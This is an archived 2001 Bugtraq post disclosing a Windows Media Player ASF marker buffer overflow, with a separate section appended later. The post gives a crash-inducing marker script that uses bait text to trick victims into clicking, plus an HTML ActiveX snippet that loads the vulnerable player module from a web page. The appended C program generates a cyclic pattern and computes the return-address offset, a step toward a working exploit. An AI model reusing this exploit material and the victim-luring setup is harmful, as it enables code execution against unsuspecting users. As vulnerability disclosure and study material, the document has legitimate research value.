[22147] in bugtraq


MS Windows Media Player ASF Marker Buffer Overflow

daemon@ATHENA.MIT.EDU (Pauli Ojanpera)
Tue Aug 7 15:09:24 2001

From: "Pauli Ojanpera" <pauli_ojanpera@hotmail.com>
To: bugtraq@securityfocus.com
Date: Tue, 07 Aug 2001 21:55:00 +0300
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F168nRMWuLn5U9T3TGJ00000e91@hotmail.com>

I dunno if I've sent this before.

If you embed a marker long enough in an .ASF video file,
you can make WMP crash when a victim clicks the
marker drop-down list under the file during playback.

Use ASFCHOP.EXE to embed the following script to any
ASF file:
----8<----cut-here-----8<----
start_marker_table
0.0 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
0.1 Click here to bypass the advertisements!
end_marker_table
----8<----cut-here-----8<----

As you can see, I used a catch to persuade the victim
to click the bar. When a victim clicks on the bar,
WMP crashes at offset 43434343 ("CCCC").

With WMP7 you have to use an ActiveX object on an HTML
page to launch the old buggy WMP module. Make sure you
set the marker bar visible in the parameters. I guess it's
the parameter "ShowGotoBar".

Dummy example:

<OBJECT classid="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" id="DSPlay1"
        name="DSPlay1" type="application/x-oleobject">
    <!-- ShowGotoBar=1 makes the marker ("Go To") bar visible so the victim can click it -->
    <PARAM NAME="ShowControls" VALUE="-1">
    <PARAM NAME="ShowGotoBar" VALUE="1">
    <PARAM NAME="ShowStatusBar" VALUE="1">
    <PARAM NAME="ControlType" VALUE="2">
    <PARAM NAME="Filename" VALUE="a.asf">
    <PARAM NAME="InvokeURLs" VALUE="-1">
</OBJECT>


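An added example, not part of the original post and not ASFCHOP or Microsoft code: the post overflows the marker name with "AAAA...BBBBCCCC" and reads the crash address 43434343 off the debugger, which proves the overwrite but does not say how many bytes precede the saved return address. The C program below writes the same ASFCHOP marker-table script as above (format copied from the post; that ASFCHOP accepts a marker of this length is assumed) with a cyclic, non-repeating pattern in marker 0.0, and maps the EIP value seen at the crash back to its byte offset in the marker text. It assumes an x86 little-endian target where EIP holds four consecutive bytes of the marker; the crash value 0x41356241 in main() is constructed for illustration, not observed.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATTERN_PERIOD 20280   /* 26 * 26 * 10 triplets * 3 bytes before the pattern repeats */

/* i-th byte of the Metasploit-style cyclic pattern Aa0Aa1...Aa9Ab0...Zz9.
 * Every 4-byte window is unique within one period, which is what lets
 * the crash EIP be mapped back to an offset. */
char pattern_char(size_t i)
{
    size_t t = i / 3;                                  /* triplet index */
    char trip[3] = { (char)('A' + (t / 260) % 26),
                     (char)('a' + (t / 10) % 26),
                     (char)('0' + t % 10) };
    return trip[i % 3];
}

/* Fill out[] with len pattern bytes plus a terminating NUL; out needs len+1 bytes. */
size_t cyclic_pattern(char *out, size_t len)
{
    for (size_t i = 0; i < len; i++)
        out[i] = pattern_char(i);
    out[len] = '\0';
    return len;
}

/* Map the value seen in EIP at the crash back to an offset in a pattern of
 * length len; returns -1 if those bytes do not occur in the pattern.
 * x86 is little-endian, so EIP 0x43434343 means the bytes "CCCC" in memory;
 * the needle is therefore built low byte first and searched in memory order. */
long pattern_offset(uint32_t eip, size_t len)
{
    static char buf[PATTERN_PERIOD + 1];
    char needle[5] = { 0 };

    if (len > PATTERN_PERIOD)
        len = PATTERN_PERIOD;                          /* longer would just repeat */
    for (int i = 0; i < 4; i++) {
        needle[i] = (char)((eip >> (8 * i)) & 0xff);
        if (!isalnum((unsigned char)needle[i]))
            return -1;                                 /* cannot be pattern bytes */
    }
    cyclic_pattern(buf, len);
    const char *p = strstr(buf, needle);
    return p ? (long)(p - buf) : -1;
}

/* Write the ASFCHOP marker-table script in the layout used in the post:
 * marker 0.0 carries the pattern, marker 0.1 the bait text. Returns 1 on success. */
int write_marker_script(FILE *fp, size_t len, const char *bait)
{
    static char buf[PATTERN_PERIOD + 1];
    if (len > PATTERN_PERIOD)
        len = PATTERN_PERIOD;
    cyclic_pattern(buf, len);
    return fprintf(fp, "start_marker_table\n0.0 %s\n0.1 %s\nend_marker_table\n",
                   buf, bait) > 0;
}

int main(void)
{
    /* A few hundred bytes, about the length of the marker in the post. */
    write_marker_script(stdout, 400, "Click here to bypass the advertisements!");

    /* Constructed example: had the debugger shown EIP = 0x41356241 ("Ab5A" in
     * memory), the overwritten return address starts 45 bytes into the marker. */
    fprintf(stderr, "offset = %ld\n", pattern_offset(0x41356241u, 400));
    return 0;
}
```

Redirect stdout to a file and feed that file to ASFCHOP as in the post; after the crash, pass the EIP value shown by the debugger to pattern_offset() to get the exact number of bytes before the return address, which is what a working exploit needs in place of the "CCCC" guess.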
